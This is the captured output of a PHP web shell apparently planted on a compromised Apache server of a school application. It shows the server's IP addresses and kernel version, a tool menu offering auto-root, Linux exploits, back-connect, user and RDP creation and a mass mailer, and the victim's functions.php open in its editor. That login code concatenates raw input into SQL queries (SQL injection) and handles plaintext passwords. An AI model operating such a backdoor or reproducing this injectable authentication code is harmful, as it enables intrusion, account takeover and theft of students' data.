Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.15.209.178
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kusdde_tobedeleted /
adm /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
_htaccess
58
B
-rwxr-xr-x
dbconnect.php
456
B
-rwxr-xr-x
functions.php
5.85
KB
-rwxr-xr-x
functions_old.php
6.08
KB
-rwxr-xr-x
payu.php
15.75
KB
-rwxr-xr-x
serverConfig.php
381
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php function checkLoginCredentials($user, $pass, $deviceID, $deviceDate,$manufacturer,$product,$model, $con) { $error = array(); $statusCode=''; $statusMessage=''; $admno=''; $degree=''; $apikey=''; $instCode=''; $branchCode=''; $class=''; $studentName =''; $imageUrl=''; $section=''; $user=strtoupper($user); //$userDisplayName=''; if ( empty( $user ) ) { //check if username is blank $error[] = 'Username is blank'; $statusCode = '0'; $statusMessage='Username is blank.'; } if ( empty( $pass ) ) { //check if password is blank $error[] = 'Password is blank'; $statusCode = '0'; $statusMessage='Password is blank.'; } if ( count( $error ) == 0 ) { $loginQuery = "SELECT * FROM masuser WHERE fusername = '{$user}' AND BINARY fpasswd = '{$pass}'"; $loginResult = mysqli_query($con,$loginQuery); if(mysqli_num_rows($loginResult) == 0) { $statusCode = '0'; $statusMessage='Wrong username or Password.Login Failed.'; } if (mysqli_num_rows($loginResult) > 1 ) { $statusCode = '0'; $statusMessage='oops!!! Something went wrong.. Please try again'; } if (mysqli_num_rows($loginResult) == 1 ) { $row = mysqli_fetch_array($loginResult,MYSQLI_ASSOC); $statusCode = '1'; $statusMessage = 'Success'; $admno = $row['fusername']; $branchCode= "1"; // if APIKEY is not found, insert a new one if(empty ($row['fapikey'])) //if the user is logging in for the first time and API key doesn't exist; { //generate the API key $key= substr(str_shuffle(str_repeat($x='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil(30/strlen($x)) )),1,30); $encryptedAPIKey = substr($pass, 0 ,2).$user.$key.substr($user, 4 ,8); //$encryptedAPIKey=md5($inputForAPIKey,1); $insertAPIQuery = "update masuser set fapikey = '{$encryptedAPIKey}' where fusername = '{$admno}' AND fpasswd = '{$pass}'"; $insertAPIResult = mysqli_query($con,$insertAPIQuery); } // if APIKEY is found, return the key back $apiKeyQuery = "select fapikey from masuser WHERE fusername = '{$user}' AND fpasswd = '{$pass}'"; $apiKeyResult = mysqli_query($con,$apiKeyQuery); $row1 = mysqli_fetch_array($apiKeyResult,MYSQLI_ASSOC); $apikey = $row1['fapikey']; $studentQueryStatement = "select s.fname as studentName,s.fadmNo as admNo, s.fdegree, s.fsection,s.fexamno, d.fdegree,d.fdescpn as class,d.fexamno,d.fexamname as examName from student s, degree d where s.fdegree = d.fdegree and s.fexamno = d.fexamno and fadmno = '{$user}'"; $studentQueryResult = mysqli_query($con, $studentQueryStatement); $row2 = mysqli_fetch_array($studentQueryResult,MYSQLI_ASSOC); $section = $row2['fsection']; $studentName = $row2['studentName']; $class = $row2['class']; // $imageUrl = "/photos/studentphotos/".$user.".bmp"; // This is to update the last login date of the user $updateLoginDate = "update masuser set flastlogin = now() where fusername = '{$user}' AND fpasswd = '{$pass}'"; $updateLoginResult= mysqli_query($con,$updateLoginDate); // This is to insert Mobile token (for push notifications) and login date in masuser. Add the token if it is not available, if available & not matching - update it. $mobileTokenQuery = "select * from deviceinfo where fusername= '{$user}'" ; $mobileTokenResult = mysqli_query($con,$mobileTokenQuery); // If the record for this student number doesn't exist..Add a new record in the device info table if(mysqli_num_rows($mobileTokenResult) == 0) { $insertDeviceIDQuery = "insert into deviceinfo (fusername,fdeviceid,fdate,manufacturer,product,model,updatedby) values ('{$user}','{$deviceID}','{$deviceDate}','{$manufacturer}','{$product}','{$model}','LOGINAPI')"; $insertDeviceIDResult = mysqli_query($con,$insertDeviceIDQuery); } else if(mysqli_num_rows($mobileTokenResult) == 1) { $row3 = mysqli_fetch_array($mobileTokenResult,MYSQLI_ASSOC); $currentMobileToken = $row3['fdeviceid']; //Check if the existing token and the newly sent token are same. If not, update the existing token. //if($currentMobileToken != $deviceID) if(strcmp($currentMobileToken,$deviceID) != 0) { $updateDeviceIDQuery = "update deviceinfo set fdeviceid = '{$deviceID}', fdate = '{$deviceDate}', manufacturer = '{$manufacturer}', product = '{$product}',model = '{$model}', updatedby = 'LOGINAPI' where fusername = '{$user}'"; $updateDeviceIDResult = mysqli_query($con,$updateDeviceIDQuery); } } } } $returnArray = array( "statusCode" => $statusCode, "statusMessage" => $statusMessage, "admno" => $admno, "studentName" => $studentName, "apikey" => $apikey, "instCode" => $instCode, "branchCode" => $branchCode, "section" => $section, "class" => $class //"imageUrl" => $imageUrl ); return $returnArray; } function checkLoginDetails($user, $pass, $empName, $con1) { $error = array(); $statusCode=''; $statusMessage=''; if ( empty( $user ) ) { //check if username is blank $error[] = 'Username is blank'; return 'Username is blank.'; }elseif ( empty( $pass ) ) { //check if password is blank $error[] = 'password is blank'; return 'Password is blank.'; } if ( count( $error ) == 0 ) { $queryStatement = "SELECT * FROM masemp WHERE fempcode = '{$user}' AND BINARY fpasswd = '{$pass}' and fempname = '{$empName}'"; $query = mysqli_query($con1, $queryStatement ); if(mysqli_num_rows( $query ) >= 1 ) { $returnString = 'Success'; } else { $returnString = 'Invalid'; } } return $returnString; } ?>
Close